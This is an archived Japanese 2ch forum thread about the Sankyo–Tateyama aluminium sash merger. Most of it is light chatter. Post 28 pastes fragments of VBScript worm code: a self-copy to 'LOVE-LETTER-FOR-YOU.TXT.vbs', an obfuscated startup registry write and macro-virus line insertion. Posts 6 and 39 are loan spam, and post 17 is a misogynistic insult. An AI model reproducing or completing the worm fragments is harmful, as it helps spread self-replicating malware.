5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★☆★三協・立山ホールディングス★☆★

1 :(仮称)名無し邸新築工事:03/12/12 23:45 ID:sE/MTI9l
三協板が手狭になってきたので作とりあえず作ってみました。

2 :ご苦労さん:03/12/13 02:48 ID:???
さっそく書かせてもらうよ。

以下 余白

3 :(仮称)名無し邸新築工事:03/12/13 04:17 ID:Xo1q+KG2
3ヽ(´ー`)ノ

4 :(仮称)名無し邸新築工事:03/12/13 05:31 ID:???
前スレくらい貼れ。
それに立てるの歯矢杉。まだ800番台じゃねーか。

5 :(仮称)名無し邸新築工事:03/12/13 13:14 ID:+mfq7MSL
▲▲▲三協アルミ【2代目】▲▲▲
http://money.2ch.net/test/read.cgi/build/1028341778/

前々スレ
▲▲▲三協アルミ▲▲▲
http://money.2ch.net/test/read.cgi/build/1011972161/

兄弟会社
■□■□■□立山アルミってどうよ■□■□■□
http://money.2ch.net/test/read.cgi/build/1021638564/

【三協・立山ホールディングス ホームページ URL】 http://www.sthdg.co.jp/

【三協アルミホームページ URL】http://www.sankyoalumi.co.jp/

【立山ホームページ URL】http://www.tateyama.co.jp/business/


ソースの不足分は↓でおながいすます。 

6 :(仮称)名無し邸新築工事:03/12/13 17:02 ID:???
★☆★キャッシング・冬のキャンペーン★☆★

ホームページによる申し込みをスタート致しました。
キャンペーン中に限り、1週間無利息にてご融資。
さらに、借入件数が5件以内の方は10日間無利息。

アルバイト・主婦の方も30万までok・全国振込みok
http://www.life-a.com/
携帯から http://www.life-a.com/i/
求人募集も行っておりますので是非ご応募ください。

7 :(仮称)名無し邸新築工事:03/12/14 14:21 ID:???
>>5
ソースの不足じゃなく、お金の不足分をフォローされてるぞ。

8 :sage:03/12/16 23:11 ID:NFNBQSRt
さびしいな。

9 :(仮称)名無し邸新築工事:03/12/19 20:38 ID:iWXrY8t2
雪だよ雪!!  

10 :(仮称)名無し邸新築工事:03/12/19 21:54 ID:???
【S−1】トステムについて語ろうU【クレディア】
http://money.2ch.net/test/read.cgi/build/1062774267/l50

YKKってどうよ
http://money.2ch.net/test/read.cgi/build/1018887212/l50

新日軽ってどうよ
http://money.2ch.net/test/read.cgi/build/1011951147/l50

不二サッシって今年つぶれるかなぁ・・・
http://money.2ch.net/test/read.cgi/build/1019271579/l50

タカラ・スタンダードってどうよ!?
http://money.2ch.net/test/read.cgi/build/1020969367/l50

サィディング業界 ニチハが何で強い?
http://money.2ch.net/test/read.cgi/build/1025062276/l50

11 :(仮称)名無し邸新築工事:03/12/21 19:24 ID:RjHZ5pQG
駄目+駄目イコールもっと駄目(・д・)

12 :(仮称)名無し邸新築工事:03/12/22 12:12 ID:???
マイナス+マイナス=マイナス
マイナス*マイナス=プラス
マイナス*プラス=マイナス
で行くと
駄目*駄目=非常に良い
とならないかい。

13 :(仮称)名無し邸新築工事:03/12/23 23:44 ID:???
ということは
赤字の会社と赤字の会社をかけあわせると黒字になるのですね?
技術がだめな会社と技術がだめな会社をかけあわせると
すばらしい技術をもった会社へと変貌するということですね?
ということでしょうか 12さん

14 :(仮称)名無し邸新築工事:03/12/24 21:37 ID:???
>>13
マジレスですか?釣りですか?

15 :(仮称)名無し邸新築工事:03/12/25 12:39 ID:???
>>13
抽象的に成立する事は具象的にも成立します。
乗算すべきか、加算すべきかはその数値の意味する物に
よって変わります。
A点からB点を経由してC点まで行くとき。
A点からB点の距離3キロメートル
B点からC点の距離3キロメートル
とするとA点からB点を通ってC点まで
こ距離は3キロメートル+3キロメートル
で6キロメートルとなる。
決して3キロメートル×3キロメートル
で9平方キロメートルとはならない。
赤字の会社同士を掛け算的に集めれば
黒字の会社にすることは可能ですね。
頭の悪い奴が仕掛けると足し算的に
しかならんと思うな。
技術にしても掛け算的に出来れば
素晴らしいものになると思うな。
掛け算とは広がりなんだな。





16 :(仮称)名無し邸新築工事:03/12/25 23:37 ID:???
ということは今回の合併は立山と三協を足して合併したのではなくて
掛け合わせて合併したからプラスへと転じたのですね
では「会社と会社を足した合併」と「会社と会社を掛けた合併」との
               違いはどこにあるのですか?
じつはわたしは今かなりの借金があり、つきあっている彼女も借金があります
結婚を考えておりますがなんとか掛け合わせて借金を貯蓄へと
転じたいのでぜひぜひご教授ください。

17 :(仮称)名無し邸新築工事:03/12/26 03:42 ID:???
>>16
その彼女を風俗に沈めれば?
あ、ブスだから無理かw

18 :(仮称)名無し邸新築工事:03/12/27 00:11 ID:???
>>15
同業である限り加減算が精一杯ではないの?
異業種でこそ乗算やべき乗の希望もありえるが。

19 :(仮称)名無し邸新築工事:03/12/27 02:22 ID:???
>>16
むつかしいな。
男一人と女一人を掛け算しても組み合わせ
が一通りだからな。
少なくとも、別な一カップルを入れて
男二人と女二人とすれば同性愛関係も
入れて4通りの組み合わせが出来るから
希望する状態になるかもね。
具体的に言うと現在の君の彼女が別の
男とくっ付きそうになって君が彼女の
気を引くために真剣に働く様になるかも
知れないし、君の浮気を止めるために彼女が
君に貢ようになるかも知れないし。
可能性は増えるな。


20 :(仮称)名無し邸新築工事:03/12/27 09:38 ID:???
「会社と会社を足した合併」と「会社と会社を掛けた合併」との
               違いはどこにあるのですか?


21 :(仮称)名無し邸新築工事:03/12/27 22:31 ID:???
おまいらオモロイな。

22 :(仮称)名無し邸新築工事:03/12/28 16:41 ID:???
18さんのまさにいう通り
関係者ならわかるとおもうが負の部分が多すぎる
具体的にはとてもじゃないがいえないし
ここには書ききれない

23 :(仮称)名無し邸新築工事:03/12/28 19:15 ID:oKfftNBA
まぁ同じ早川町内で同じ様な物作り合っていてもどうかと思うが。



24 :(仮称)名無し邸新築工事:03/12/31 11:34 ID:???
前の立山スレの最期は情けなかった。
990-1000は謝罪と賠償しろ(w

25 :(仮称)名無し邸新築工事:03/12/31 15:22 ID:???
「しる!」だろw

26 :24:03/12/31 15:27 ID:???
スマン(w

謝罪汁!!

27 :(仮称)名無し邸新築工事:04/01/04 06:59 ID:???
明日から仕事ですね。
今日は早く寝て遅刻しないように
しましょうね。

28 :(仮称)名無し邸新築工事:04/01/10 19:15 ID:uqjBOd2m
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))




29 :(仮称)名無し邸新築工事:04/01/21 20:27 ID:iSixJXBC
age

30 :(仮称)名無し邸新築工事:04/02/02 07:44 ID:???
ag

31 :(仮称)名無し邸新築工事:04/02/06 18:51 ID:???
なかなか来ないね
皆さん。

32 :(仮称)名無し邸新築工事:04/02/07 14:12 ID:???
呼んだ?
減収増益? Tさんしっかりしてちょ。
ン百億円も設備投資するぞ って意気込んでるんだからさ。

33 :(仮称)名無し邸新築工事:04/02/08 04:59 ID:???
俺の日記帳にしてしまうぞ。
2月7日
天気 雪
夕方、車庫前の除雪をした。
明日までほーって置くと除雪が大変になるので
雪が柔らかいうちにやっておくのだ。
晩飯は鰯のつみれ鍋、いいだしが出ていて
美味かった。


34 :(仮称)名無し邸新築工事:04/02/08 10:02 ID:???
朝5時かよ。

35 :(仮称)名無し邸新築工事:04/02/08 12:15 ID:???
2月8日
朝からパチスロに行く。
2万も負けてしまった・・・
今月どうしよう、もうだめだ。
かみさんには怖くて金額言えないよ。

36 :(仮称)名無し邸新築工事:04/02/08 18:46 ID:???
2月8日
天気 曇り時々雪
朝、道を見てびっくり
昨日の除雪が水の泡、長靴でも埋もれそう。
犬の散歩をしていて気が付いた。
昨日の除雪は大正解だった。
雪に埋まっている車を何台も見た。
朝飯の後に除雪した30分かからずに
出来た。
一日読書、昼寝。
4時過ぎに風呂にはいって酒を飲んだ。
昼飯 ラーメン
夕飯 牡蠣フライ
以上


37 :(仮称)名無し邸新築工事:04/02/08 22:21 ID:???
とりあえず、3代目を埋めてからにしろよ

38 :(仮称)名無し邸新築工事:04/02/19 19:05 ID:???
>>37
3代目に誰もいないよ。

39 :(仮称)名無し邸新築工事:04/02/19 22:32 ID:???
★☆★安心と信頼のキャッシング★☆★

安心の2ヵ条
1、当社は融資審査時から完済時まで、お金を借りた事が
  職場・身内の人に絶対に知られないノウハウでご融資。
2、当社は都1の登録ですが、短期小口貸・紹介屋では、
  絶対にありませんので、ご安心してお申し込み下さい。
  法定金利内のご融資で、支払いは月1回利息のみでも
  もちろん大丈夫です。
http://a3091.fromc.com/


40 :(仮称)名無し邸新築工事:04/02/22 22:43 ID:Di8ZvByO
もうこれでいいじゃん。みんな書きませう。

41 :(仮称)名無し邸新築工事:04/02/25 20:15 ID:???
何書けばいいんじゃ

42 :(仮称)名無し邸新築工事:04/02/29 00:33 ID:wv45pnts
>>41
給料明細

43 :(仮称)名無し邸新築工事:04/02/29 17:58 ID:???
>>42
人の給料明細を知ってどうするのかね?
自分のと比べて少ないのを見てよろこびたいの?
それとも
自分のと比べて多いのを見て発奮したいの?
どちらでも貴方の希望にあわせて書いてあげるよ。
まず最初は
仕事が無くて収入ゼロ、女房に養ってもらっているの。
これでいい?

44 :(仮称)名無し邸新築工事:04/03/01 22:15 ID:???
nya?


45 :(仮称)名無し邸新築工事:04/03/02 22:36 ID:SprGmMQq
STPかぁ・・・

46 :(仮称)名無し邸新築工事:04/03/02 23:05 ID:???
組織名まで三協の真似になっていく…。

47 :(仮称)名無し邸新築工事:04/03/03 22:11 ID:???
>>46
立山の方ですか?
三協側によほど悪い所が無い限り、長い物に巻かれるのは当然の流れでつよ。
単純に効率いいだけで、別に立山が悪いわけじゃないから悲観しなさんな。

48 :(仮称)名無し邸新築工事:04/03/04 02:37 ID:???
やっと確定申告書が出来た。
始めての確定申告だ郵送で済まそう。
今までサラリーマンは源泉徴収で税金取られるから不利だと
思っていたけどそうでもないな。
株の儲けには必要経費が全く認められていないんだよ。
定率減税なんてあって無条件に20パーセント減額出来るんだな。
勉強になった。


49 :(仮称)名無し邸新築工事:04/03/08 19:27 ID:cbIeisJI
age

50 :(仮称)名無し邸新築工事:04/03/08 23:28 ID:3oTqB5RS
株価あがってるな。

51 :(仮称)名無し邸新築工事:04/03/09 07:14 ID:???
ちょっとな

52 :(仮称)名無し邸新築工事:04/03/14 09:19 ID:???
閑?

53 :(仮称)名無し邸新築工事:04/03/14 16:22 ID:???
漏れのところは忙しい。

54 :(仮称)名無し邸新築工事:04/03/15 18:14 ID:???
祝 株価 400円 回復


55 :(仮称)名無し邸新築工事:04/03/15 20:14 ID:EoxcQ1Nz
激暇ですー潰れるんじゃないか不安

56 :名無しさん:04/03/16 14:54 ID:???
400記念

57 :(仮称)名無し邸新築工事:04/03/17 01:42 ID:???
暇な人は遊んでいてね。
そのうち仕事が出来るからね。

58 :(仮称)名無し邸新築工事:04/03/20 21:34 ID:???
今日の夕飯
マグロの刺し身
湯豆腐

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)